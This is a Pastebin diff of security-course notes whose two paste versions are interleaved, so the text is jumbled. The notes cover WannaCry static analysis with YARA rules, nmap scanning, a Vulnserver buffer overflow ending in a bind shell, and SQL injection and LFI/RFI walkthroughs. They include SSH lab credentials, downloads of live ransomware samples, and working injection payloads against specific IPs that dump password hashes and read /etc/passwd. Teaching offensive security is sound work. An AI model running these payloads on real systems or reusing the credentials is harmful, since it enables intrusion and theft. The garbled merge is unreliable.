View difference between Paste ID: <a href="/MrUfuF81">MrUfuF81</a> and <a href="/kJc1yz14">kJc1yz14</a> - Pastebin.com

View difference between Paste ID: MrUfuF81 and kJc1yz14

SHOW: | | - or go back to the newest paste.

#####################################################
# Offensive/Defensive Cyber   (New ECSA 2019)       #
# Offensive/Defensive Cyber                         #
# By Joe McCray                                     #
#####################################################
 
- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319
 
 
- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/
 
 
- I prefer to use Putty to SSH into my Linux host.
- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
 
Here is the information to put into putty
 
Host Name:          107.191.39.106
protocol:           ssh
port:               22
username:           ecsa
username:           ciscosecurity
password:           GermanyNewYork!#         
password:           ciscosecurity123!#         
 
 




mkdir static_analysis
Indicators of Compromise (IoC)
-----------------------------
cd static_analysis

1. Modify the filesystem
wget http://45.63.104.73/wannacry.zip
2. Modify the registry          - ADVAPI32.dll (persistance)
3. Modify processes/services
unzip wannacry.zip
4. Connect to the network       - WS2_32.dll
     infected

 
 
if you can't detect a registry change across 5% of your network
mv wannacry.exe malware.pdf

 
 
EDR Solution
mv malware.pdf wannacry.exe

 
 
1. Static Analysis  <----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
    - Modify FS                     - File integrity checker
    - Modify registry
    - Modify processes/services
    - Connect to the network
 
 
 
2. Dynamic Analysis
Runs the file in a VM/Sandbox
 
################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
 
 
The fastest thing you can do is perform static analysis.
 
 
 
 
###################
# Static Analysis #
###################

---------------------------Type This-----------------------------------
 
cd ~/static_analysis
 
file wannacry.exe
 
cp wannacry.exe malware.pdf
 
file malware.pdf
 
hexdump -n 2 -C wannacry.exe
 
----------------------------------------------------------------------
 
 
***What is '4d 5a' or 'MZ'***
-------------------------Paste this URL into Firefox-----------------------------------
http://www.garykessler.net/library/file_sigs.html
--------------------------------------------------------------------------------------- 
 
 
 
---------------------------Type This-----------------------------------
cd ~/static_analysis

objdump -x wannacry.exe

objdump -x wannacry.exe | less
     q
 
strings wannacry.exe
 
strings wannacry.exe | grep -i dll
 
strings wannacry.exe | grep -i library
 
strings wannacry.exe | grep -i reg
 
strings wannacry.exe | grep -i key
 
strings wannacry.exe | grep -i rsa
 
strings wannacry.exe | grep -i open
 
strings wannacry.exe | grep -i get
 
strings wannacry.exe | grep -i mutex
 
strings wannacry.exe | grep -i irc
 
strings wannacry.exe | grep -i join        
 
strings wannacry.exe | grep -i admin
 
strings wannacry.exe | grep -i list
----------------------------------------------------------------------
 
 
 
 
 
---------------------------Type This-----------------------------------
cd ~/static_analysis
pe info wannacry.exe
pe check wannacry.exe
pe dump --section text wannacry.exe
pe dump --section data wannacry.exe
pe dump --section rsrc wannacry.exe
pe dump --section reloc wannacry.exe
strings rdata | less
strings rsrc | less
strings text | less
----------------------------------------------------------------------
 
 
 
 
 
 
 
 
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
 
Quick Google search for "wannacry ransomeware analysis"
Decided to make my own script for this kind of stuff in the future. I

 
Reference1:

http://45.63.104.73/analyse_malware.py

 
This is a really good script for the basics of static analysis

 
 
Strings:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
$s2 = “Wanna Decryptor” wide ascii nocase
$s3 = “.wcry” wide ascii nocase
$s4 = “WANNACRY” wide ascii nocase
$s5 = “WANACRY!” wide ascii nocase
Here is my own script using the signatures (started this yesterday, but still needs work):

https://pastebin.com/guxzCBmP

 
 
 
 
wget https://pastebin.com/raw/guxzCBmP

 
Ok, let's look for the individual strings
mv guxzCBmP am.py

 
---------------------------Type This-----------------------------------
cd ~/static_analysis

python2.7 am.py wannacry.exe

 
strings wannacry.exe | grep -i wanna
 
strings wannacry.exe | grep -i wcry
 
# Yara Ninja #

 
strings wannacry.exe | grep -i wanacry          **** Matches $s5, hmmm.....
----------------------------------------------------------------------
 
 
----------------------------------------------------------------------------

rule wannacry_1 : ransom

{

    meta:

        author = "Joshua Cannell"

        description = "WannaCry Ransomware strings"

        weight = 100
Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis
        date = "2017-05-12"

Reference:
    strings:

        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase

        $s2 = "Wanna Decryptor" wide ascii nocase

        $s3 = ".wcry" wide ascii nocase

        $s4 = "WANNACRY" wide ascii nocase

        $s5 = "WANACRY!" wide ascii nocase

        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

cd ~/static_analysis
    condition:

        any of them

}

python3 am.py wannacry.exe
----------------------------------------------------------------------------

rule wannacry_2{

    meta:

        author = "Harold Ogden"

        description = "WannaCry Ransomware Strings"

        date = "2017-05-12"

        weight = 100

cd ~/static_analysis/oledump
    strings:

        $string1 = "msg/m_bulgarian.wnry"

        $string2 = "msg/m_chinese (simplified).wnry"

        $string3 = "msg/m_chinese (traditional).wnry"

        $string4 = "msg/m_croatian.wnry"

        $string5 = "msg/m_czech.wnry"

        $string6 = "msg/m_danish.wnry"

        $string7 = "msg/m_dutch.wnry"

        $string8 = "msg/m_english.wnry"

        $string9 = "msg/m_filipino.wnry"

        $string10 = "msg/m_finnish.wnry"

        $string11 = "msg/m_french.wnry"

        $string12 = "msg/m_german.wnry"

        $string13 = "msg/m_greek.wnry"

        $string14 = "msg/m_indonesian.wnry"

        $string15 = "msg/m_italian.wnry"

        $string16 = "msg/m_japanese.wnry"

        $string17 = "msg/m_korean.wnry"

        $string18 = "msg/m_latvian.wnry"

        $string19 = "msg/m_norwegian.wnry"

        $string20 = "msg/m_polish.wnry"

        $string21 = "msg/m_portuguese.wnry"

        $string22 = "msg/m_romanian.wnry"

        $string23 = "msg/m_russian.wnry"

        $string24 = "msg/m_slovak.wnry"

        $string25 = "msg/m_spanish.wnry"

        $string26 = "msg/m_swedish.wnry"

        $string27 = "msg/m_turkish.wnry"

        $string28 = "msg/m_vietnamese.wnry"



    condition:

        any of ($string*)
# Security Operations Center Job Roles  #
}
# Intrusion Analysis Level 1            #
----------------------------------------------------------------------------

Required Technical Skills: 		Comfortable with basic Linux/Windows (MCSA/Linux+)
								Comfortable with basic network (Network+)
								Comfortable with security fundamentals (Security+)
		




Job Task: 						Process security events, follow incident response triage playbook

#########################################
mkdir ~/oledump
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 2            #
cd ~/oledump


wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
Required Technical Skills: 		Comfortable with basic Linux/Windows system administration
								Comfortable with basic network administration
unzip oledump_V0_0_22.zip
								Comfortable with basic programming
								Comfortable researching IT security issues
wget http://45.63.104.73/064016.zip
		

unzip 064016.zip

     infected


Job Task: 						Perform detailed malware analysis, assist with development of the incident response triage playbook

#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 3            #
#########################################

Required Technical Skills: 		Strong statistical analysis background
								Strong programming background (C, C++, Java, Assembly, scripting languages)
								Advanced system/network administration background
								Comfortable researching IT security issues
		




Job Task: 						Perform detailed malware analysis 
								Perform detailed statistical analysis
								Assist with development of the incident response triage playbook




-------------------------------------------------------------------------------------------------------------------------
#######################
# Passive Recon       #
# aka: OSINT          #
# aka: Footprinting #
#######################
 
- Wikipedia Page
    - Are they Public or Private?
    - Does the target have any subsidiaries?
        - Have they had any scandals?
 
- Robtex
    - Show system map

- Sample OSINT Report:
	https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc

- Misc
	OSINT on a hacker group:
	https://en.wikipedia.org/wiki/Anonymous_(group)
	https://en.wikipedia.org/wiki/LulzSec

	OSINT on a terrorist group:
	https://en.wikipedia.org/wiki/Al-Qaeda
	https://en.wikipedia.org/wiki/Taliban
	https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant
	



Step 1: Download Nmap
--------------------
Windows: https://nmap.org/dist/nmap-7.70-setup.exe
Mac OS X: https://nmap.org/dist/nmap-7.70.dmg
 
Linux:
--- Fedora/CentOS/RHEL:    sudo yum install -y nmap
--- Ubuntu/Mint/Debian:    sudo apt-get install -y nmap
 
 
 
########################
# Scanning Methodology #
########################
 
- Ping Sweep
What's alive?
------------
Note: On windows you won't need to use the word "sudo" in front of the command below:
 
sudo nmap -sL 157.166.226.* | grep com

sudo nmap -sP 157.166.226.*
 
---------------------------or on Windows type:---------------------------------------------
c:\nmap -sP 157.166.226.*
 
--------------------------------------------------------------------------------------------
 
 
 
    -if -SP yields no results try:
Note: On windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sL 157.166.226.*
 
---------------------------or on Windows type:---------------------------------------------
c:\nmap -sL 157.166.226.*
 
------------------------------------------------------------------------------------------
 
 
 
    -Look for hostnames:
Note: On windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep cnn
 
---------------------------or on Windows type:---------------------------------------------
c:\nmap -sP 157.166.226.* | findstr "cnn"
 
-------------------------------------------------------------------------------------------
 
 
 
- Port Scan
What's where?
------------
Note: On windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sS 162.243.126.247
 
---------------------------or on Windows type:----------------------------------------------
c:\nmap -sS 162.243.126.247
 
--------------------------------------------------------------------------------------------
 
 
 
- Bannergrab/Version Query
What versions of software are running
-------------------------------------
Note: On windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sV 162.243.126.247
 
---------------------------or on Windows type:---------------------------------------------
c:\nmap -sV 162.243.126.247
-------------------------------------------------------------------------------------------
 
 
 
Let's dig into this a little bit more:
-------------------------------------
Note: On windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443
 
---------------------------or on Windows type:---------------------------------------------
c:\nmap -sV --script=http-headers 162.243.126.247 -p 80,443
-------------------------------------------------------------------------------------------
 
 
 
- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/
 
---------------------------------------------------------------------------------------------------------------------------------



Network Penetration Testing Process (known vulnerabilities)
-----------------------------------------------------------
 
 
1. Ping Sweep:
The purpose of this step is to identify live hosts
 
    nmap -sP <ip-address/ip-range>
 
 
2. Port Scan
Identify running services. We use the running services to map the network topology.
 
    nmap -sS <ip-address/ip-range>
 
 
3. Bannergrab
Identify the version of version of software running on each port
 
    nmap -sV <ip-address/ip-range>
   
 
 
4. Vulnerability Research
Use the software version number to research and determine if it is out of date (vulnerable).
 
    windows ->  systeminfo

    Linux->     dpkg -l

            rpm -qa

 
 
 
 
 
 
 
Skill Level 1. Run the scanners
-------------------------------
    Nexpose
    Qualys
    Retina
    Nessus              known vulnerabilities
    OpenVas
    Foundscan
    GFI LanGuard
    NCircle
 
 
Skill Level 2. Manual vulnerability validation (known vulnerabilities)
-----------------------------------------------------------------------
 
    windows ->  	systeminfo
    Linux->     	dpkg -l			(Debian/Ubuntu/Mint)
            		rpm -qa			(RHEL/Fedora/Centos)

	Mac OS X->		sudo find / -iname *.app
 
 
 
 
 
 
 
#####################################
# Quick Stack Based Buffer Overflow #
#####################################
 
- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip
http://45.63.104.73/nc-password-is-netcat.zip   <--- save this file to your c:\windows\system32 directory
 
 
- Extract the ExploitLab.zip file to your Desktop
 
- Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe
 


- Open a new command prompt and type:
 
---------------------------Type This-----------------------------------
nc localhost 9999
--------------------------------------------------------------------------

If you don't have netcat you can download it from here:
http://45.63.104.73/nc-password-is-netcat.zip

The file nc.zip is password protected (password is 'password'), you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.

 
- In the new command prompt window where you ran nc type:
HELP
 
- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
 
- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
 
 
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
 
- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
 
- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
 
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
 
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
 
- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
 
4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
 
5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
 
6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
 
7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444
 
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
 
 
------------------------------
 
 
 
Skill Level 3. Identify unknown vulnerabilities
-----------------------------------------------
 
- App Type
------------
    Stand Alone             Client Server               Web App
 
                        ***(vulnerserver.exe)***
 
 
- Input TYpe
-------------
    FIle                    logical network port            Browser
    Keyboard
    Mouse
 
 
 
                        ***(9999)***
 
 
- Map & Fuzz app entry points:
------------------------------
    - Commands              ***(commands)***
    - Methods
    - Verbs
    - functions
    - subroutines
    - controllers
 
 
- Isolate the crash
-------------------
App seems to reliably crash at TRUN 2100
 
 
- Calculate the distance to EIP
-------------------------------
Distance to EIP is 2006
 
We found that EIP was populated with the value: 396F4338
396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
 
An online tool that we can use for this is:
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
 
 
 
- Redirect Program Execution
----------------------------
A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
We learned that we control EAX and ESP in script 2.
 
 
 
 
 
- Implement Shellcode
---------------------
There are only 2 things that can go wrong with shellcode:
- Not enough space
- Bad characters
 
 
 
 



#######################################################
# Open the following web links below as tabs          #
# For each web link answer all of the questions below #
#######################################################
https://www.exploit-db.com/exploits/46762
https://www.exploit-db.com/exploits/46070
https://www.exploit-db.com/exploits/40713
https://www.exploit-db.com/exploits/46458
https://www.exploit-db.com/exploits/40712
https://www.exploit-db.com/exploits/40714
https://www.exploit-db.com/exploits/40680
https://www.exploit-db.com/exploits/40673
https://www.exploit-db.com/exploits/40681
https://www.exploit-db.com/exploits/37731
https://www.exploit-db.com/exploits/31254
https://www.exploit-db.com/exploits/31255
https://www.exploit-db.com/exploits/27703
https://www.exploit-db.com/exploits/27277
https://www.exploit-db.com/exploits/26495
https://www.exploit-db.com/exploits/24557
https://www.exploit-db.com/exploits/39417
https://www.exploit-db.com/exploits/23243
 
 
 
                      ###############################
###################### # Class Exploit Dev Quiz Task # ######################
                      ###############################
1. Vulnerable Software Info
    a- Product Name
    b- Software version
    c- Available for download
 
 
2. Target platform
    a- OS Name								(ex: Windows XP)
    b- Service pack							(ex: SP3)
    c- Language pack						(ex: English)
 
 
3. Exploit info
    a- modules imported                     (ex: sys, re, os)
    b- application entry point              (ex: TRUN)
    c- distance to EIP                      (ex: 2006)
    d- how is code redirection done         (ex: JMP ESP, JMP ESI)
    e- number of NOPs                       (ex: 10 * \x90  = 10 NOPs)
    f- length of shellcode					(ex: 368)
    g- bad characters                       (ex: \x0a\x00\x0d)
    h- is the target ip hard-coded
    i- what does the shellcode do           (ex: bind shell, reverse shell, calc)
    j- what is the total buffer length
    k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
    l- Is this a server side or client-side exploit






 
 
#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################
 
 
 
Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/
 
1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable ‘junk2’
 
 
 
 
Analysis of the training walk-through based on EID: 15689:
http://45.63.104.73/ff.zip
 
 
 
 
ff1.py
1. What does the sys module do?
2. What is sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?
 
 
 
ff2.py
1. Explain what is happening in lines 18 - 20 doing.
2. What is pattern_create.rb doing and where can I find it?
3. Why can’t I just double click the file to run this script?
 
 
 
ff3.py
1. Explain what is happening in lines 17 - to 25?
2. Explain what is happening in lines 30 - to 32?
3. Why is everything below line 35 commented out?
 
 
 
ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?
 
 
 
ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?
 
 
 
ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?
 
 
 
 
ff7.py
1. What is a tuple in python?
2. How big is the shellcode in this script?
3. Did your app crash in from this script?
 
 
 
 
ff8.py
1. How big is the shellcode in this script?
2. What is try/except in python?
3. What is socket.SOCK_STREAM in Python?
 
 
 
ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. From what DLL did the address of the JMP ESP come from?
 
 
 
 
ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?



#########################################
# Offensive Cyber Operations Job Roles  #
# Intrusion Analysis Level 1            #
#########################################
Required Technical Skills: 		Comfortable with basic Linux/Windows (MCSA/Linux+)
								Comfortable with basic network (Network+)
								Comfortable with security fundamentals (Security+)
		


Job Task: 						Run network security scanners and assist with documentation of known vulnerabilities


Tools Used:
								Nmap
    							Nexpose
    							Qualys
    							Retina
    							Nessus              known vulnerabilities
    							OpenVas
    							Foundscan
    							GFI LanGuard
    							NCircle
 


#########################################
# Offensive Cyber Operations Job Roles  #
# Intrusion Analysis Level 2            #
#########################################
Required Technical Skills: 		Comfortable with basic Linux/Windows system administration
								Comfortable with basic network administration
								Comfortable with basic programming
								Comfortable researching IT security issues
		


Job Task: 						Run network security scanners and assist with document of known vulnerabilities
								Perform manual vulnerability validation
								Analyze public exploit and develop threat analysis reports
								Assess simple applications for vulnerabilities



#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 3            #
#########################################

Required Technical Skills: 		Strong programming background (C, C++, Java, Assembly, scripting languages)
								Advanced system/network administration background
								Comfortable researching IT security issues
		




Job Task: 						Perform manual vulnerability validation
								Analyze public exploit and develop threat analysis reports
								Assess complex applications for vulnerabilities








##################################
# Basic: Web Application Testing #
##################################
 
Most people are going to tell you reference the OWASP Testing guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
 
I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
 
 
The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
   
    1. Does the website talk to a DB?
        - Look for parameter passing (ex: site.com/page.php?id=4)
        - If yes - try SQL Injection
 
    2. Can I or someone else see what I type?
        - If yes - try XSS
 
    3. Does the page reference a file?
        - If yes - try LFI/RFI
 
Let's start with some manual testing against 45.63.104.73
 
 
#######################
# Attacking PHP/MySQL #
#######################
 
Go to LAMP Target homepage
http://45.63.104.73/
 
 
 
Clicking on the Acer Link:
http://45.63.104.73/acre2.php?lap=acer
 
   - Found parameter passing (answer yes to question 1)
   - Insert ' to test for SQLI
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer'
 
-----------------------------------------------------------------------
 
Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
 
 
 
In order to perform union-based sql injection - we must first determine the number of columns in this query.
We do this using the ORDER BY
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '100' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '50' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '25' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
-----------------------------------------------------------------------
 
Page returns the following error:
Unknown column '12' in 'order clause'
 
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
-----------------------------------------------------------------------
 
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
 
 
 
Now we build out the union all select statement with the correct number of columns
 
Reference:
http://www.techonthenet.com/sql/union.php
 
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
-----------------------------------------------------------------------
 
 
 
Now we negate the parameter value 'acer' by turning into the word 'null':
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
-----------------------------------------------------------------------
 
We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
 
 
Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
 
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
 
-----------------------------------------------------------------------
 
 
 
########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
 
Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
 
Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
 
 
 
 
#########################
# File Handling Attacks #
#########################
 
Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/showfile.php?filename=about.txt
 
-----------------------------------------------------------------------
 
 
See if you can read files on the file system:
---------------------------Type This-----------------------------------
 
http://45.63.104.73/showfile.php?filename=/etc/passwd
-----------------------------------------------------------------------
 
We call this attack a Local File Include or LFI.
 
Now let's find some text out on the internet somewhere:
https://www.gnu.org/software/hello/manual/hello.txt
 
 
Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
 
---------------------------Type This-----------------------------------
 
http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
-----------------------------------------------------------------------
 
#########################################################################################
# SQL Injection                                                                         #
# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
#########################################################################################
 
 
- Another quick way to test for SQLI is to remove the paramter value
 
 
#############################
# Error-Based SQL Injection #
#############################
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
 
-----------------------------------------------------------------------
 
 
 
#############################
# Union-Based SQL Injection #
#############################
 
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------
 
   We are using a union select statement because we are joining the developer's query with one of our own.
   Reference:
   http://www.techonthenet.com/sql/union.php
   The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
   It removes duplicate rows between the various SELECT statements.
 
   Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
 
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------
 
   Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
 
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
 
-----------------------------------------------------------------------
 
 
 
 
- Another way is to see if you can get the backend to perform an arithmetic function
 
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=(2)
http://45.77.162.239/bookdetail.aspx?id=(4-2)  
http://45.77.162.239/bookdetail.aspx?id=(4-1)
 
 
 
http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
http://45.77.162.239/bookdetail.aspx?id=1*1
http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
http://45.77.162.239/bookdetail.aspx?id=2 &0#
 
 
 
http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
 
-----------------------------------------------------------------------
 
 
###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
   
3 - Total Characters
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)
-----------------------------------------------------------------------
 
Let's go for a quick check to see if it's DBO
 
---------------------------Type This-----------------------------------
 
http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
-----------------------------------------------------------------------
 
Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
 
---------------------------Type This-----------------------------------
 
D  - 1st Character
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--  
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
